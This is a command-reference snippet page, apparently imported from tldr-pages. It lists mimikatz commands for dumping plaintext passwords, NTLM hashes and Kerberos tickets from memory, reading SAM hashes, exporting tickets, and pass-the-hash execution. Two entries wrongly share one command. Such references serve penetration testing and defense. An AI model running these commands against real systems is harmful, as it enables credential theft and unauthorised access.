HiveBrain v1.2.0
Get Started
← Back to all entries
snippetbashTip

mimikatz — Interact with Windows credentials, perform credential dumping, token manipulation, and more. Require

Submitted by: @import:tldr-pages··
0
Viewed 0 times
commandwindowsinteractclicredentialsmimikatzwithperform
windows

Problem

How to use the mimikatz command: Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: <https://github.com/gentilkiwi/mimikatz>.

Solution

mimikatz — Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: <https://github.com/gentilkiwi/mimikatz>.

Run mimikatz in interactive mode:
mimikatz


Enable debug privileges (needed for most operations):
mimikatz "privilege::debug"


List available logon sessions:
mimikatz "sekurlsa::logonpasswords"


Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory:
mimikatz "sekurlsa::logonpasswords"


Pass-the-Hash with a specific NTLM hash and launch a command:
mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"


Dump local SAM database hashes:
mimikatz "lsadump::sam"


Extract Kerberos tickets and export to a file:
mimikatz "kerberos::list /export"


[Interactive] Exit mimikatz:
exit

Code Snippets

Run mimikatz in interactive mode

mimikatz

Enable debug privileges (needed for most operations)

mimikatz "privilege::debug"

List available logon sessions

mimikatz "sekurlsa::logonpasswords"

Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory

mimikatz "sekurlsa::logonpasswords"

Pass-the-Hash with a specific NTLM hash and launch a command

mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"

Context

tldr-pages: windows/mimikatz

Revisions (0)

No revisions yet.